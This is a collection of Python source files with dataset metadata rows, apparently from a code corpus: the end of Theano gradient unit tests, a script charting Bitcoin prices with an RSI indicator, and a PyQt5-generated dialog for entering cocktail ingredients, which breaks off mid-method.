        self.assertRaises(ValueError, grad_sources_inputs,
                          [(a2.out, one)], None)

    def test_1in_1out(self):
        """Test grad is called correctly for a 1-to-1 op"""
        gval = theano.tensor.matrix()

        class O(gof.op.Op):
            def make_node(self):
                inputs = [theano.tensor.matrix()]
                outputs = [theano.tensor.matrix()]
                return gof.Apply(self, inputs, outputs)

            def grad(self, inp, grads):
                return gval,
        a1 = O().make_node()
        g = grad_sources_inputs([(a1.outputs[0], one)], None)
        self.assertTrue(g[a1.inputs[0]] is gval)

    def test_1in_Nout(self):
        """Test grad is called correctly for a 1-to-many op"""
        gval = theano.tensor.matrix()

        class O(gof.op.Op):
            def make_node(self):
                inputs = [theano.tensor.matrix()]
                outputs = [theano.tensor.scalar(), theano.tensor.scalar()]
                return gof.Apply(self, inputs, outputs)

            def grad(self, inp, grads):
                x, = inp
                gz1, gz2 = grads
                return gval,
        a1 = O().make_node()
        g = grad_sources_inputs([(a1.outputs[0], one)], None)
        self.assertTrue(g[a1.inputs[0]] is gval)

    def test_Nin_1out(self):
        """Test grad is called correctly for a many-to-1 op"""
        gval0 = theano.tensor.scalar()
        gval1 = theano.tensor.scalar()

        class O(gof.op.Op):
            def make_node(self):
                inputs = [theano.tensor.scalar(), theano.tensor.scalar()]
                outputs = [theano.tensor.matrix()]
                return gof.Apply(self, inputs, outputs)

            def grad(self, inp, grads):
                x0, x1 = inp
                gz, = grads
                return (gval0, gval1)
        a1 = O().make_node()
        g = grad_sources_inputs([(a1.outputs[0], one)], None)
        self.assertTrue(g[a1.inputs[0]] is gval0)
        self.assertTrue(g[a1.inputs[1]] is gval1)

    def test_Nin_Nout(self):
        """Test grad is called correctly for a many-to-many op"""
        gval0 = theano.tensor.matrix()
        gval1 = theano.tensor.matrix()

        class O(gof.op.Op):
            def make_node(self):
                inputs = [theano.tensor.matrix(), theano.tensor.matrix()]
                outputs = [theano.tensor.matrix(), theano.tensor.matrix()]
                return gof.Apply(self, inputs, outputs)

            def grad(self, inp, grads):
                return gval0, gval1
        a1 = O().make_node()
        g = grad_sources_inputs([(a1.outputs[0], one)], None)
        self.assertTrue(g[a1.inputs[0]] is gval0)
        self.assertTrue(g[a1.inputs[1]] is gval1)
class test_grad(unittest.TestCase):
    """Tests of theano.gradient.grad itself: error reporting for
    unimplemented/undefined gradients, naming, numeric correctness via
    verify_grad, integer inputs, disconnected inputs, connection patterns,
    dtype preservation, and consider_constant handling."""

    def test_unimplemented_grad_func(self):
        # tests that function compilation catches unimplemented grads
        # in the graph
        a = theano.tensor.vector()
        b = theano.gradient.grad_not_implemented(theano.tensor.add, 0, a)
        self.assertRaises(TypeError, theano.function,
                          [a], b, on_unused_input='ignore')

    def test_undefined_grad_func(self):
        # tests that function compilation catches undefined grads in the graph
        a = theano.tensor.vector()
        b = theano.gradient.grad_undefined(theano.tensor.add, 0, a)
        self.assertRaises(TypeError, theano.function,
                          [a], b, on_unused_input='ignore')

    def test_unimplemented_grad_grad(self):
        # tests that unimplemented grads are caught in the grad method
        class DummyOp(gof.Op):
            def make_node(self, x):
                return gof.Apply(self, [x], [x.type()])

            def grad(self, inputs, output_grads):
                return [theano.gradient.grad_not_implemented(
                    self, 0, inputs[0])]
        a = theano.tensor.scalar()
        b = DummyOp()(a)
        self.assertRaises(TypeError, theano.gradient.grad, b, a)

    def test_undefined_grad_grad(self):
        # tests that undefined grads are caught in the grad method
        # (conv3D declares its gradient wrt the stride argument d undefined)
        V = theano.tensor.TensorType(dtype=config.floatX,
                                     broadcastable=(False, False, False, False, False))()
        W = theano.tensor.TensorType(dtype=config.floatX,
                                     broadcastable=(False, False, False, False, False))()
        b = theano.tensor.vector()
        d = theano.tensor.ivector()
        Z = conv3D(V, W, b, d)
        self.assertRaises(TypeError, theano.gradient.grad, Z.sum(), d)

    def test_grad_name(self):
        A = theano.tensor.matrix('A')
        x = theano.tensor.vector('x')
        f = theano.tensor.dot(x, theano.tensor.dot(A, x))
        f.name = 'f'
        g = theano.tensor.grad(f, x)
        assert g.name == '(df/dx)'

    def test_grad_duplicate_input(self):
        # test that the grad works when a variable
        # appears in more than one place in a node's input list
        def output(x):
            return (x * x)
        rng = np.random.RandomState([2012, 8, 28])
        vx = rng.randn(2)
        theano.tests.unittest_tools.verify_grad(output, [vx])

    def test_grad_quadratic(self):
        # test the gradient on a tiny graph
        def cost(x, A):
            return theano.tensor.dot(x, theano.tensor.dot(A, x))
        rng = np.random.RandomState([2012, 8, 28])
        vx = rng.randn(2)
        vA = rng.randn(2, 2)
        theano.tests.unittest_tools.verify_grad(cost, [vx, vA])

    def test_grad_quadratic_vector(self):
        # test the gradient on a small graph
        def output(x, A):
            return theano.tensor.dot(x * x, A)
        rng = np.random.RandomState([2012, 8, 28])
        vx = rng.randn(2)
        vA = rng.randn(2, 2)
        theano.tests.unittest_tools.verify_grad(output, [vx, vA])

    def test_grad_cubic(self):
        # test the gradient on a bigger graph
        def cost(x, A):
            return theano.tensor.dot(x * x, theano.tensor.dot(A, x))
        rng = np.random.RandomState([2012, 8, 28])
        vx = rng.randn(2)
        vA = rng.randn(2, 2)
        theano.tests.unittest_tools.verify_grad(cost, [vx, vA])

    def test_grad_grad_quadratic(self):
        # test the gradient on a graph constructed using the gradient
        def output(x, A):
            orig_cost = theano.tensor.dot(x, theano.tensor.dot(A, x))
            return theano.gradient.grad(orig_cost, x)
        rng = np.random.RandomState([2012, 8, 28])
        vx = rng.randn(2)
        vA = rng.randn(2, 2)
        theano.tests.unittest_tools.verify_grad(output, [vx, vA])

    def test_grad_grad_cubic(self):
        # test the gradient on a bigger graph constructed using the gradient
        def output(x, A):
            orig_cost = theano.tensor.dot(x * x, theano.tensor.dot(A, x))
            return theano.gradient.grad(orig_cost, x)
        rng = np.random.RandomState([2012, 8, 28])
        vx = rng.randn(2)
        vA = rng.randn(2, 2)
        theano.tests.unittest_tools.verify_grad(output, [vx, vA])

    def test_grad_int(self):
        # tests that the gradient with respect to an integer
        # is the same as the gradient with respect to a float
        W = theano.tensor.matrix()
        b = theano.tensor.vector()

        def make_grad_func(X):
            Z = theano.tensor.dot(X, W) + b
            H = theano.tensor.nnet.sigmoid(Z)
            cost = H.sum()
            g = gradient.grad(cost, X)
            return theano.function([X, W, b], g, on_unused_input='ignore')

        int_func = make_grad_func(theano.tensor.imatrix())
        # we have to use float64 as the float type to get the results to match
        # using an integer for the input makes all the later functions use
        # float64
        float_func = make_grad_func(theano.tensor.matrix(dtype='float64'))

        m = 5
        d = 3
        n = 4
        rng = np.random.RandomState([2012, 9, 5])

        int_type = theano.tensor.imatrix().dtype
        float_type = 'float64'

        X = np.cast[int_type](rng.randn(m, d) * 127.)
        W = np.cast[W.dtype](rng.randn(d, n))
        b = np.cast[b.dtype](rng.randn(n))

        int_result = int_func(X, W, b)
        float_result = float_func(np.cast[float_type](X), W, b)

        assert np.allclose(int_result, float_result), (
            int_result, float_result)

    def test_grad_disconnected(self):
        # tests corner cases of gradient for shape and alloc
        x = theano.tensor.vector(name='x')
        total = x.sum()
        total.name = 'total'
        num_elements = x.shape[0]
        num_elements.name = 'num_elements'
        silly_vector = theano.tensor.alloc(total / num_elements, num_elements)
        silly_vector.name = 'silly_vector'
        cost = silly_vector.sum()
        cost.name = 'cost'
        # note that cost simplifies to be the same as "total"
        g = gradient.grad(cost, x, add_names=False)
        # we still need to pass in x because it determines the shape of
        # the output
        f = theano.function([x], g)
        rng = np.random.RandomState([2012, 9, 5])
        x = np.cast[x.dtype](rng.randn(3))
        g = f(x)
        assert np.allclose(g, np.ones(x.shape, dtype=x.dtype))

    def test_disconnected_nan(self):
        # test that connection_pattern can prevent getting NaN

        # Op1 has two outputs, f and g
        # x is connected to f but not to g
        class Op1(theano.gof.Op):
            def make_node(self, x):
                return theano.Apply(self, inputs=[x],
                                    outputs=[x.type(), theano.tensor.scalar()])

            def connection_pattern(self, node):
                return [[True, False]]

            def grad(self, inputs, output_grads):
                return [inputs[0].zeros_like()]

        # Op2 has two inputs, f and g
        # Its gradient with respect to g is not defined
        class Op2(theano.gof.Op):
            def make_node(self, f, g):
                return theano.Apply(self, inputs=[f, g],
                                    outputs=[theano.tensor.scalar()])

            def grad(self, inputs, output_grads):
                return [inputs[0].zeros_like(), NullType()()]

        x = theano.tensor.vector()
        f, g = Op1()(x)
        cost = Op2()(f, g)

        # cost is differentiable wrt x
        # but we can't tell that without using Op1's connection pattern
        # looking at the theano graph alone, g is an ancestor of cost
        # and has x as an ancestor, so we must compute its gradient
        g = gradient.grad(cost, x)
        # If we made it to here without an exception, then the
        # connection_pattern functionality worked correctly

    def test_downcast_dtype(self):
        # Test that the gradient of a cost wrt a float32 variable does not
        # get upcasted to float64.
        # x has dtype float32, regardless of the value of floatX
        x = theano.tensor.fscalar('x')
        y = x * 2
        z = theano.tensor.lscalar('z')

        c = y + z
        dc_dx, dc_dy, dc_dz, dc_dc = theano.grad(c, [x, y, z, c])
        # The dtype of dc_dy and dc_dz can be either float32 or float64,
        # that might depend on floatX, but is not specified.
        assert dc_dc.dtype in ('float32', 'float64')
        assert dc_dz.dtype in ('float32', 'float64')
        assert dc_dy.dtype in ('float32', 'float64')

        # When the output gradient of y is passed to op.grad, it should
        # be downcasted to float32, so dc_dx should also be float32
        assert dc_dx.dtype == 'float32'

    def test_grad_constant(self):
        # Test that the gradient handles Constants and consider_constant variables
        # consistently

        x = theano.tensor.scalar()
        y = theano.tensor.scalar()
        z_x = x + y
        z_one = one + y
        g_x = theano.tensor.grad(z_x, x, consider_constant=[x])
        g_one = theano.tensor.grad(z_one, one)

        f = theano.function([x, y], [g_x, g_one])

        g_x, g_one = f(1, .5)

        if not np.allclose(g_x, g_one):
            raise AssertionError("Gradient using consider constant is " + str(g_x)
                                 + " but gradient with respect to the same Constant is "
                                 + str(g_one))
def test_known_grads():
    # Tests that the grad method with no known_grads
    # matches what happens if you put its own known_grads
    # in for each variable
    # NOTE: this file targets Python 2 (print statements below).

    full_range = theano.tensor.arange(10)
    x = theano.tensor.scalar('x')
    t = theano.tensor.iscalar('t')
    ft = full_range[t]
    ft.name = 'ft'
    coeffs = theano.tensor.vector('c')
    ct = coeffs[t]
    ct.name = 'ct'
    p = x ** ft
    p.name = 'p'
    y = ct * p
    y.name = 'y'
    cost = theano.tensor.sqr(y)
    cost.name = 'cost'

    # "layers" are cuts through the graph, from the cost down to the inputs;
    # gradients propagated through each cut should match the direct gradient.
    layers = [
        [cost],
        [y],
        [ct, p],
        [ct, x, ft],
        [coeffs, t, full_range, x]
    ]

    inputs = [coeffs, t, x]

    rng = np.random.RandomState([2012, 11, 15])
    values = [rng.randn(10), rng.randint(10), rng.randn()]
    values = [np.cast[ipt.dtype](value) for ipt, value in zip(inputs, values)]

    true_grads = theano.tensor.grad(cost, inputs, disconnected_inputs='ignore')
    true_grads = theano.function(inputs, true_grads)
    true_grads = true_grads(*values)

    for layer in layers:
        print 'Testing by separately computing ', layer
        first = theano.tensor.grad(cost, layer, disconnected_inputs='ignore')
        known = dict(zip(layer, first))
        full = theano.tensor.grad(cost=None,
                                  known_grads=known, wrt=inputs, disconnected_inputs='ignore')
        full = theano.function(inputs, full)
        full = full(*values)
        assert len(true_grads) == len(full)
        for a, b, var in zip(true_grads, full, inputs):
            if not np.allclose(a, b):
                # Dump diagnostics before failing.
                print 'Failure'
                print a
                print b
                print var
                print layer
                for v in known:
                    print v, ':', theano.function(inputs, known[v])(*values)
                assert False
def test_dxdx():
    """Check that the gradient of a scalar with respect to itself is 1.

    An integer scalar is used deliberately: people keep changing this
    gradient to be 0 on integers, but according to our interpretation of
    the gradient as defined in the Op contract, it should be 1. If you
    feel the need to change this unit test you are probably modifying the
    Op contract and should definitely get the approval of multiple people
    on theano-dev.
    """
    var = theano.tensor.iscalar()
    grad_expr = theano.tensor.grad(var, var)
    result = grad_expr.eval({var: 12})
    assert np.allclose(result, 1.)
def test_known_grads_integers():
    # Tests that known_grads works on integers:
    # the supplied output gradient should be passed straight through.

    x = theano.tensor.iscalar()
    g_expected = theano.tensor.scalar()

    g_grad = theano.gradient.grad(cost=None,
                                  known_grads={x: g_expected},
                                  wrt=x)

    f = theano.function([g_expected], g_grad)

    x = -3
    gv = np.cast[theano.config.floatX](.6)

    g_actual = f(gv)

    assert np.allclose(g_actual, gv)
def test_undefined_cost_grad():
    # Tests that if we say the cost is not differentiable via the
    # known_grads mechanism, it is treated as such by the rest of the
    # system.
    # This is so that Ops that are built around minigraphs like OpFromGraph
    # and scan can implement Op.grad by passing ograds to known_grads

    x = theano.tensor.iscalar()
    y = theano.tensor.iscalar()
    cost = x + y
    assert cost.dtype in theano.tensor.discrete_dtypes
    try:
        # NullType()() marks the cost's gradient as undefined.
        grads = theano.tensor.grad(cost, [x, y], known_grads={cost: NullType()()})
    except theano.gradient.NullTypeGradError:
        return
    raise AssertionError("An undefined gradient has been ignored.")
def test_disconnected_cost_grad():
    # Tests that if we say the cost is disconnected via the
    # known_grads mechanism, it is treated as such by the rest of the
    # system.
    # This is so that Ops that are built around minigraphs like OpFromGraph
    # and scan can implement Op.grad by passing ograds to known_grads

    x = theano.tensor.iscalar()
    y = theano.tensor.iscalar()
    cost = x + y
    assert cost.dtype in theano.tensor.discrete_dtypes
    try:
        # DisconnectedType()() marks the cost's gradient as disconnected;
        # with disconnected_inputs='raise' this must raise.
        grads = theano.tensor.grad(cost, [x, y],
                                   known_grads={cost: gradient.DisconnectedType()()},
                                   disconnected_inputs='raise')
    except theano.gradient.DisconnectedInputError:
        return
    raise AssertionError("A disconnected gradient has been ignored.")
class TestConsiderConstant(unittest.TestCase):
    """Tests for gradient.consider_constant: the op should be removed from
    compiled graphs and should block gradient flow through its argument."""

    def setUp(self):
        utt.seed_rng()
        self.rng = np.random.RandomState(seed=utt.fetch_seed())

    def test_op_removed(self):
        x = theano.tensor.matrix('x')
        y = x * gradient.consider_constant(x)
        f = theano.function([x], y)
        # need to refer to theano.gradient.consider_constant_ here,
        # theano.gradient.consider_constant is a wrapper function!
        assert gradient.consider_constant_ not in \
            [node.op for node in f.maker.fgraph.toposort()]

    def test_grad(self):
        T = theano.tensor
        a = np.asarray(self.rng.randn(5, 5),
                       dtype=config.floatX)

        x = T.matrix('x')

        # Pairs of (expression, its expected gradient wrt x).
        expressions_gradients = [
            (x * gradient.consider_constant(x), x),
            (x * gradient.consider_constant(T.exp(x)), T.exp(x)),
            (gradient.consider_constant(x), T.constant(0.)),
            (x**2 * gradient.consider_constant(x), 2 * x**2),
        ]

        for expr, expr_grad in expressions_gradients:
            g = gradient.grad(expr.sum(), x)
            # gradient according to theano
            f = theano.function([x], g, on_unused_input='ignore')
            # desired gradient
            f2 = theano.function([x], expr_grad, on_unused_input='ignore')

            assert np.allclose(f(a), f2(a))
# Run the unittest test cases when executed as a script.
if __name__ == '__main__':
    unittest.main()
| 33.415 | 106 | 0.590004 |
acfb5f9769ed8611f2c83a6c225d2c804f6199b2 | 2,055 | py | Python | charting.py | ryuen/Cryptocurrrency-Prices | ee77ac6e9faa3f5844b43490d904d3176e5c92b4 | [
"MIT"
] | null | null | null | charting.py | ryuen/Cryptocurrrency-Prices | ee77ac6e9faa3f5844b43490d904d3176e5c92b4 | [
"MIT"
] | null | null | null | charting.py | ryuen/Cryptocurrrency-Prices | ee77ac6e9faa3f5844b43490d904d3176e5c92b4 | [
"MIT"
] | null | null | null | import time
import datetime
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
import matplotlib.dates as mdates
import matplotlib.cbook as cbook
import pandas as pd
# Number of most-recent rows (candles) taken from the end of the CSV for charting.
howFarBack = 10000
def rsiFunc(prices, n=14):
    """Compute the Relative Strength Index (RSI) of a price series.

    Uses Wilder's smoothing of average gains/losses over a window of ``n``
    periods. Returns a float array the same length as ``prices``; the first
    ``n`` entries are seeded with the RSI of the initial window.

    :param prices: sequence of prices (list or array)
    :param n: smoothing period (default 14)
    :return: numpy float array of RSI values in [0, 100]

    NOTE: a monotone series makes the average loss 0, so rs becomes inf/nan
    (numpy warns rather than raises); callers should feed mixed data.
    """
    # BUG FIX: force float dtype. np.zeros_like on an int input inherited an
    # integer dtype, silently truncating every RSI value.
    prices = np.asarray(prices, dtype=float)
    deltas = np.diff(prices)
    seed = deltas[:n + 1]
    up = seed[seed >= 0].sum() / n
    down = -seed[seed < 0].sum() / n
    rs = up / down
    rsi = np.zeros_like(prices)
    rsi[:n] = 100. - 100. / (1. + rs)

    # BUG FIX: was range(n, len(prices) - 1), which never filled the final
    # element, leaving rsi[-1] == 0.
    for i in range(n, len(prices)):
        delta = deltas[i - 1]
        if delta > 0:
            upval = delta
            downval = 0.
        else:
            upval = 0.
            downval = -delta

        # Wilder's smoothing of the running average gain/loss.
        up = (up * (n - 1) + upval) / n
        down = (down * (n - 1) + downval) / n

        rs = up / down
        rsi[i] = 100. - 100. / (1. + rs)

    return rsi
def ExpMovingAverage(values, window):
    """Exponentially weighted moving average over ``values``.

    The kernel is exp(linspace(-1, 0, window)) normalized to sum to 1.
    The first ``window`` output entries are padded with the value at index
    ``window`` (they would otherwise be partial sums).
    """
    kernel = np.exp(np.linspace(-1., 0., window))
    kernel = kernel / kernel.sum()
    full_conv = np.convolve(values, kernel, mode='full')
    smoothed = full_conv[:len(values)]
    smoothed[:window] = smoothed[window]
    return smoothed
def chartData():
    """Load OHLCV data from the local CSV and plot price (bottom) and a
    50-period RSI (top) in one figure.

    NOTE(review): the path 'Data\\BitfinexBTCUSD.csv' uses a backslash; it
    happens to work because \\B is not an escape sequence, but it is
    Windows-specific -- confirm before running elsewhere.
    """
    Datear = []
    Pricear = []
    Volumear = []
    # CSV has no header; first column is a unix timestamp (seconds).
    df = pd.read_csv('Data\BitfinexBTCUSD.csv', parse_dates = True, names=['Date', 'Open', 'High', 'Low', 'Close', 'Volume'])
    df['Date'] = pd.to_datetime(df['Date'], unit='s')
    # Keep only the most recent `howFarBack` rows.
    Datear = df['Date'][-howFarBack:]
    Pricear = df['Close'][-howFarBack:]
    Volumear = df['Volume'][-howFarBack:]
    # Bottom 4/6 of the grid: closing price.
    ax1 = plt.subplot2grid((6,4),(2,0), rowspan=4, colspan=4)
    ax1.plot(Datear, Pricear)
    ax1.grid(True)
    rsiLine = rsiFunc(Pricear, n=50)
    # Top 2/6 of the grid: RSI with the conventional 70/30 bands.
    ax2 = plt.subplot2grid((6,4),(0,0), rowspan=2, colspan=4)
    ax2.plot(Datear, rsiLine)
    ax2.grid(True)
    ax2.axhline(70, color='r')
    ax2.axhline(30, color='g')
    ax2.set_yticks([70, 30])
    plt.show()
# Render the chart immediately when the script runs (no __main__ guard).
chartData()
| 25.6875 | 123 | 0.508516 |
acfb60105810d1f9ff756b76ea01f49fae8c156e | 11,512 | py | Python | src/ui_elements/handadds.py | AndreWohnsland/CocktailBerry | 60b2dfc3a4a6f3ef9ab2d946a97d14829e575a9d | [
"MIT"
] | 1 | 2022-03-06T23:50:34.000Z | 2022-03-06T23:50:34.000Z | src/ui_elements/handadds.py | AndreWohnsland/CocktailBerry | 60b2dfc3a4a6f3ef9ab2d946a97d14829e575a9d | [
"MIT"
] | 4 | 2022-03-03T11:16:17.000Z | 2022-03-20T15:53:37.000Z | src/ui_elements/handadds.py | AndreWohnsland/CocktailBerry | 60b2dfc3a4a6f3ef9ab2d946a97d14829e575a9d | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file '.\handadds.ui'
#
# Created by: PyQt5 UI code generator 5.15.6
#
# WARNING: Any manual changes made to this file will be lost when pyuic5 is
# run again. Do not edit this file unless you know what you are doing.
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_handadds(object):
    """pyuic5-generated UI class for the 'hand add' dialog (see file header:
    manual changes are overwritten when pyuic5 is re-run). Lays out five
    rows of (ingredient combo box, amount line edit, 'ml' label) plus
    confirm/cancel buttons."""

    def setupUi(self, handadds):
        """Build the widget tree and layouts on the given QDialog."""
        handadds.setObjectName("handadds")
        handadds.resize(420, 300)
        handadds.setMinimumSize(QtCore.QSize(420, 300))
        handadds.setMaximumSize(QtCore.QSize(420, 300))
        handadds.setStyleSheet("")
        handadds.setModal(True)
        self.verticalLayout = QtWidgets.QVBoxLayout(handadds)
        self.verticalLayout.setObjectName("verticalLayout")
        # Header label
        self.LHeader = QtWidgets.QLabel(handadds)
        self.LHeader.setMaximumSize(QtCore.QSize(16777215, 40))
        font = QtGui.QFont()
        font.setPointSize(20)
        font.setBold(True)
        font.setWeight(75)
        self.LHeader.setFont(font)
        self.LHeader.setAlignment(QtCore.Qt.AlignCenter)
        self.LHeader.setObjectName("LHeader")
        self.verticalLayout.addWidget(self.LHeader)
        self.horizontalLayout = QtWidgets.QHBoxLayout()
        self.horizontalLayout.setSizeConstraint(QtWidgets.QLayout.SetDefaultConstraint)
        self.horizontalLayout.setSpacing(6)
        self.horizontalLayout.setObjectName("horizontalLayout")
        # Column 1: ingredient combo boxes
        self.verticalLayout_2 = QtWidgets.QVBoxLayout()
        self.verticalLayout_2.setObjectName("verticalLayout_2")
        self.CBHandadd1 = QtWidgets.QComboBox(handadds)
        self.CBHandadd1.setMinimumSize(QtCore.QSize(103, 28))
        self.CBHandadd1.setMaximumSize(QtCore.QSize(200, 28))
        font = QtGui.QFont()
        font.setPointSize(14)
        font.setBold(False)
        font.setWeight(50)
        self.CBHandadd1.setFont(font)
        self.CBHandadd1.setObjectName("CBHandadd1")
        self.verticalLayout_2.addWidget(self.CBHandadd1)
        self.CBHandadd2 = QtWidgets.QComboBox(handadds)
        self.CBHandadd2.setMinimumSize(QtCore.QSize(103, 28))
        self.CBHandadd2.setMaximumSize(QtCore.QSize(200, 28))
        font = QtGui.QFont()
        font.setPointSize(14)
        font.setBold(False)
        font.setWeight(50)
        self.CBHandadd2.setFont(font)
        self.CBHandadd2.setObjectName("CBHandadd2")
        self.verticalLayout_2.addWidget(self.CBHandadd2)
        self.CBHandadd3 = QtWidgets.QComboBox(handadds)
        self.CBHandadd3.setMinimumSize(QtCore.QSize(103, 28))
        self.CBHandadd3.setMaximumSize(QtCore.QSize(200, 28))
        font = QtGui.QFont()
        font.setPointSize(14)
        font.setBold(False)
        font.setWeight(50)
        self.CBHandadd3.setFont(font)
        self.CBHandadd3.setObjectName("CBHandadd3")
        self.verticalLayout_2.addWidget(self.CBHandadd3)
        self.CBHandadd4 = QtWidgets.QComboBox(handadds)
        self.CBHandadd4.setMinimumSize(QtCore.QSize(103, 28))
        self.CBHandadd4.setMaximumSize(QtCore.QSize(200, 28))
        font = QtGui.QFont()
        font.setPointSize(14)
        font.setBold(False)
        font.setWeight(50)
        self.CBHandadd4.setFont(font)
        self.CBHandadd4.setObjectName("CBHandadd4")
        self.verticalLayout_2.addWidget(self.CBHandadd4)
        self.CBHandadd5 = QtWidgets.QComboBox(handadds)
        self.CBHandadd5.setMinimumSize(QtCore.QSize(103, 28))
        self.CBHandadd5.setMaximumSize(QtCore.QSize(200, 28))
        font = QtGui.QFont()
        font.setPointSize(14)
        font.setBold(False)
        font.setWeight(50)
        self.CBHandadd5.setFont(font)
        self.CBHandadd5.setObjectName("CBHandadd5")
        self.verticalLayout_2.addWidget(self.CBHandadd5)
        self.horizontalLayout.addLayout(self.verticalLayout_2)
        # Column 2: amount line edits (ClickableLineEdit imported at module end)
        self.verticalLayout_5 = QtWidgets.QVBoxLayout()
        self.verticalLayout_5.setObjectName("verticalLayout_5")
        self.LEHandadd1 = ClickableLineEdit(handadds)
        self.LEHandadd1.setMinimumSize(QtCore.QSize(0, 28))
        self.LEHandadd1.setMaximumSize(QtCore.QSize(100, 28))
        font = QtGui.QFont()
        font.setPointSize(14)
        self.LEHandadd1.setFont(font)
        self.LEHandadd1.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
        self.LEHandadd1.setObjectName("LEHandadd1")
        self.verticalLayout_5.addWidget(self.LEHandadd1)
        self.LEHandadd2 = ClickableLineEdit(handadds)
        self.LEHandadd2.setMinimumSize(QtCore.QSize(0, 28))
        self.LEHandadd2.setMaximumSize(QtCore.QSize(100, 28))
        font = QtGui.QFont()
        font.setPointSize(14)
        self.LEHandadd2.setFont(font)
        self.LEHandadd2.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
        self.LEHandadd2.setObjectName("LEHandadd2")
        self.verticalLayout_5.addWidget(self.LEHandadd2)
        self.LEHandadd3 = ClickableLineEdit(handadds)
        self.LEHandadd3.setMinimumSize(QtCore.QSize(0, 28))
        self.LEHandadd3.setMaximumSize(QtCore.QSize(100, 28))
        font = QtGui.QFont()
        font.setPointSize(14)
        self.LEHandadd3.setFont(font)
        self.LEHandadd3.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
        self.LEHandadd3.setObjectName("LEHandadd3")
        self.verticalLayout_5.addWidget(self.LEHandadd3)
        self.LEHandadd4 = ClickableLineEdit(handadds)
        self.LEHandadd4.setMinimumSize(QtCore.QSize(0, 28))
        self.LEHandadd4.setMaximumSize(QtCore.QSize(100, 28))
        font = QtGui.QFont()
        font.setPointSize(14)
        self.LEHandadd4.setFont(font)
        self.LEHandadd4.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
        self.LEHandadd4.setObjectName("LEHandadd4")
        self.verticalLayout_5.addWidget(self.LEHandadd4)
        self.LEHandadd5 = ClickableLineEdit(handadds)
        self.LEHandadd5.setMinimumSize(QtCore.QSize(0, 28))
        self.LEHandadd5.setMaximumSize(QtCore.QSize(100, 28))
        font = QtGui.QFont()
        font.setPointSize(14)
        self.LEHandadd5.setFont(font)
        self.LEHandadd5.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
        self.LEHandadd5.setObjectName("LEHandadd5")
        self.verticalLayout_5.addWidget(self.LEHandadd5)
        self.horizontalLayout.addLayout(self.verticalLayout_5)
        # Column 3: static "ml" unit labels
        self.verticalLayout_3 = QtWidgets.QVBoxLayout()
        self.verticalLayout_3.setObjectName("verticalLayout_3")
        self.label_11 = QtWidgets.QLabel(handadds)
        self.label_11.setMinimumSize(QtCore.QSize(60, 0))
        self.label_11.setMaximumSize(QtCore.QSize(60, 28))
        font = QtGui.QFont()
        font.setPointSize(18)
        font.setBold(False)
        font.setWeight(50)
        self.label_11.setFont(font)
        self.label_11.setObjectName("label_11")
        self.verticalLayout_3.addWidget(self.label_11)
        self.label_12 = QtWidgets.QLabel(handadds)
        self.label_12.setMinimumSize(QtCore.QSize(60, 0))
        self.label_12.setMaximumSize(QtCore.QSize(60, 28))
        font = QtGui.QFont()
        font.setPointSize(18)
        font.setBold(False)
        font.setWeight(50)
        self.label_12.setFont(font)
        self.label_12.setObjectName("label_12")
        self.verticalLayout_3.addWidget(self.label_12)
        self.label_13 = QtWidgets.QLabel(handadds)
        self.label_13.setMinimumSize(QtCore.QSize(60, 0))
        self.label_13.setMaximumSize(QtCore.QSize(60, 28))
        font = QtGui.QFont()
        font.setPointSize(18)
        font.setBold(False)
        font.setWeight(50)
        self.label_13.setFont(font)
        self.label_13.setObjectName("label_13")
        self.verticalLayout_3.addWidget(self.label_13)
        self.label_15 = QtWidgets.QLabel(handadds)
        self.label_15.setMinimumSize(QtCore.QSize(60, 0))
        self.label_15.setMaximumSize(QtCore.QSize(60, 28))
        font = QtGui.QFont()
        font.setPointSize(18)
        font.setBold(False)
        font.setWeight(50)
        self.label_15.setFont(font)
        self.label_15.setObjectName("label_15")
        self.verticalLayout_3.addWidget(self.label_15)
        self.label_14 = QtWidgets.QLabel(handadds)
        self.label_14.setMinimumSize(QtCore.QSize(60, 0))
        self.label_14.setMaximumSize(QtCore.QSize(60, 28))
        font = QtGui.QFont()
        font.setPointSize(18)
        font.setBold(False)
        font.setWeight(50)
        self.label_14.setFont(font)
        self.label_14.setObjectName("label_14")
        self.verticalLayout_3.addWidget(self.label_14)
        self.horizontalLayout.addLayout(self.verticalLayout_3)
        self.verticalLayout.addLayout(self.horizontalLayout)
        # Bottom row: confirm ("Eintragen") and cancel ("Abbrechen") buttons
        self.horizontalLayout_2 = QtWidgets.QHBoxLayout()
        self.horizontalLayout_2.setObjectName("horizontalLayout_2")
        self.PBEintragen = QtWidgets.QPushButton(handadds)
        self.PBEintragen.setMinimumSize(QtCore.QSize(200, 40))
        self.PBEintragen.setMaximumSize(QtCore.QSize(200, 16777215))
        font = QtGui.QFont()
        font.setPointSize(20)
        font.setBold(True)
        font.setWeight(75)
        self.PBEintragen.setFont(font)
        self.PBEintragen.setObjectName("PBEintragen")
        self.horizontalLayout_2.addWidget(self.PBEintragen)
        self.PBAbbrechen = QtWidgets.QPushButton(handadds)
        self.PBAbbrechen.setMinimumSize(QtCore.QSize(0, 40))
        font = QtGui.QFont()
        font.setPointSize(20)
        font.setBold(True)
        font.setWeight(75)
        self.PBAbbrechen.setFont(font)
        self.PBAbbrechen.setObjectName("PBAbbrechen")
        self.horizontalLayout_2.addWidget(self.PBAbbrechen)
        self.verticalLayout.addLayout(self.horizontalLayout_2)

        self.retranslateUi(handadds)
        QtCore.QMetaObject.connectSlotsByName(handadds)

    def retranslateUi(self, handadds):
        """Set all translatable strings and cssClass dynamic properties."""
        _translate = QtCore.QCoreApplication.translate
        handadds.setWindowTitle(_translate("handadds", "Zutaten zum selbst hinzufügen"))
        self.LHeader.setText(_translate("handadds", "Ingredients for hand add"))
        self.LHeader.setProperty("cssClass", _translate("handadds", "secondary"))
        self.LEHandadd1.setProperty("cssClass", _translate("handadds", "secondary"))
        self.LEHandadd2.setProperty("cssClass", _translate("handadds", "secondary"))
